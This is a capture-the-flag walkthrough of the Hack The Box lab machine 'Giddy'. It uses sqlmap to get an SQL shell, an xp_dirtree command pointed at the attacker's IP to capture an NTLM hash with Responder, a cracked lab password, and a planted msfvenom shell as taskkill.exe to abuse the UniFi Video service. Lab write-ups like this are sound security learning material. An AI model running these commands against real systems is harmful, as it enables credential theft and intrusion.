Hack The Box - Giddy

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled.png

NMAP :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%201.png

Enumerating Web

⇒ We found 2 directories :

http://10.10.10.104/remote

http://10.10.10.104/mvc/

⇒ Enumerating http://10.10.10.104/remote/

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%202.png

→ We have an powershell web access login page. We dont have any credentials…

⇒ Enumerating http://10.10.10.104/mvc/

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%203.png

→ It’s vulnerable to SQLi :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%204.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%205.png

Performing SQL injection

⇒ Running SQLmap

→ We find the following databases.

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%206.png

→ Sadly we didnt find anything useful in the databases.

⇒ We see that its MSSQL so we can do good old dirtree to steal user hash

→ Starting responder :

responder -i tun0

→ Getting sql-shell :

sqlmap -r vuln.req --batch --sql-shell

→ Executing command :

EXEC master.sys.xp_dirtree '\\10.10.14.4\enox'

→ Getting dem hashes 😎

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%207.png

→ Cracking the hash :

Stacy : xNnWo6272k7x

⇒ Lets go back to the powershell web access page and login with these credentials

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%208.png

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%209.png

Privilege Escalation

→ We see unifivideo in Stacy user Documents :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%2010.png

→ Found an exploit : https://www.exploit-db.com/exploits/43390

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%2011.png

⇒ So looks like we can create msfvenom shell, name it taskkill.exe and place it in the folder and then just start the service.

→ There’s Windows Defender running on the box. Creating shell using metasploit :

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%2012.png

→ Placing it in C:\ProgramData\unifi-video\

→ Restarting the service :

stop-service -name UniFivideoservice

start-service unifivideoservice

https://raw.githubusercontent.com/CsEnox/csenox.github.io/master/img/Giddy%20Box%209f34e85c33034d68b41afb90df49686f/Untitled%2013.png